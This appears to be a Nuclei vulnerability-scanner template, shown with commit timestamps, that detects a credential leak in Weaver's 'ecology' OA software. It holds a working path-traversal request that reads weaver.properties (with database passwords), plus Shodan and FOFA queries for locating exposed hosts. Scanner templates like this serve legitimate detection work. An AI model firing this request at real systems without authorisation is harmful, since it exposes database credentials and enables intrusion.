nuclei-templates/http/misconfiguration/ecology-info-leak.yaml

40 lines
1.2 KiB
YAML
Raw Normal View History

2023-08-29 08:12:37 +00:00
id: ecology-info-leak
info:
name: Ecology - Information Exposure
author: qianbenhyu
severity: high
description: |
The "ecology" component exposes a file that contains sensitive database credentials (dbuser/dbpass).
reference:
2023-08-29 08:18:38 +00:00
- https://github.com/xinyisleep/pocscan/blob/main/%E6%B3%9B%E5%BE%AE/oa%E6%B3%9B%E5%BE%AE0day%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96.py
2023-08-29 08:12:37 +00:00
metadata:
verified: true
max-request: 1
2023-10-14 11:27:55 +00:00
shodan-query: ecology_JSessionid
fofa-query: app="泛微-协同办公OA"
2023-08-29 08:15:48 +00:00
tags: ecology,unauth,misconfig
2023-08-29 08:12:37 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties"
2023-08-29 08:26:41 +00:00
matchers-condition: and
2023-08-29 08:12:37 +00:00
matchers:
- type: word
part: body
words:
- "ecology.password"
- "ecology.charset"
2023-08-29 08:18:38 +00:00
condition: and
2023-08-29 08:12:37 +00:00
2023-08-29 08:27:41 +00:00
- type: word
part: header
words:
- "text/plain"
2023-08-29 08:12:37 +00:00
- type: status
status:
2023-08-29 08:15:48 +00:00
- 200
# digest: 4b0a00483046022100f4b8bb749fd79aea26a355c822283699f5d0596aad0483647a314023e376604e022100f180eebc65e0dc135cdc4c37c87552f2acd76935990f718365337e68d4c22e60:922c64590222798bb761d5b6d8e72950